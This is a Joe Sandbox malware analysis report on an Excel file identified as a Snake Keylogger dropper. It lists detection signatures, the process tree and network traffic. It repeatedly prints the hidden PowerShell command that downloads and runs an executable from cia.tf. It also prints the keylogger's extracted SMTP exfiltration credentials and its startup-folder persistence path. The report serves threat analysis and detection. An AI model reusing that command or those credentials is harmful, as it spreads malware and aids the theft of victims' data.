Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DGTCkacbSz.xlsx

Overview

General Information

Sample name:DGTCkacbSz.xlsx
renamed because original name is a hash value
Original sample name:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39(1).xlsx
Analysis ID:1562377
MD5:adfcfa59a06bbc5a0faa8f5b0ff663fe
SHA1:01d4b8e70b641863727d671e9b087633f3b3a37e
SHA256:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39
Tags:cia-tfxlsxuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Drops large PE files
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • powershell.exe (PID: 3604 cmdline: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • tmp667.exe (PID: 3808 cmdline: "C:\Users\user\AppData\Local\Temp\tmp667.exe" MD5: 2ED7362E959D42385D4E6D231A6840DD)
  • wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • svcost.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Roaming\svcost.exe" MD5: E3902A9C7AC3C2180B535F81DA7CD147)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x18ff5:$a1: get_encryptedPassword
        • 0x192e1:$a2: get_encryptedUsername
        • 0x18e01:$a3: get_timePasswordChanged
        • 0x18efc:$a4: get_passwordField
        • 0x1900b:$a5: set_encryptedPassword
        • 0x1a688:$a7: get_logins
        • 0x1a5eb:$a10: KeyLoggerEventArgs
        • 0x1a256:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x1c9b8:$x1: $%SMTPDV$
        • 0x1ca1e:$x2: $#TheHashHere%&
        • 0x1e02f:$x3: %FTPDV$
        • 0x1e123:$x4: $%TelegramDv$
        • 0x1a256:$x5: KeyLoggerEventArgs
        • 0x1a5eb:$x5: KeyLoggerEventArgs
        • 0x1e053:$m2: Clipboard Logs ID
        • 0x1e273:$m2: Screenshot Logs ID
        • 0x1e383:$m2: keystroke Logs ID
        • 0x1e65d:$m3: SnakePW
        • 0x1e24b:$m4: \SnakeKeylogger\
        Click to see the 22 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.tmp667.exe.48b0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          5.2.tmp667.exe.3695570.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.tmp667.exe.3695570.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              5.2.tmp667.exe.3695570.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12c85:$a1: get_encryptedPassword
              • 0x12f71:$a2: get_encryptedUsername
              • 0x12a91:$a3: get_timePasswordChanged
              • 0x12b8c:$a4: get_passwordField
              • 0x12c9b:$a5: set_encryptedPassword
              • 0x14318:$a7: get_logins
              • 0x1427b:$a10: KeyLoggerEventArgs
              • 0x13ee6:$a11: KeyLoggerEventArgsEventHandler
              5.2.tmp667.exe.3695570.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1a6af:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x198e1:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19d14:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ad53:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 9 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3960, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3960, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3604, TargetFilename: C:\Users\user\AppData\Local\Temp\xrkefh21.pa1.ps1

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tmp667.exe, ProcessId: 3808, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: DGTCkacbSz.xlsxAvira: detected
              Source: DGTCkacbSz.xlsxAvira: detected
              Antivirus detection for URL or domain
              Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exeAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\svcost.exeAvira: detection malicious, Label: HEUR/AGEN.1310409
              Found malware configuration
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeReversingLabs: Detection: 68%
              Multi AV Scanner detection for submitted file
              Source: DGTCkacbSz.xlsxReversingLabs: Detection: 39%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\svcost.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: DGTCkacbSz.xlsxJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 00600D90h5_2_00600CD8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 006B0944h5_2_006B08A8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 006B0944h5_2_006B0B20
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 006B0944h5_2_006B0C56
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 006FB60Bh5_2_006FB401
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then jmp 006FB60Bh5_2_006FB410
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_0498DB88
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C20944h8_2_00C20898
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C20944h8_2_00C208A8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C20944h8_2_00C20AFE
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C20944h8_2_00C20C56
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C2F5D0h8_2_00C2F510
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C2F5D0h8_2_00C2F518
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C5B60Bh8_2_00C5B401
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then jmp 00C5B60Bh8_2_00C5B410
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_04B7DB88
              Source: global trafficDNS query: name: cia.tf
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
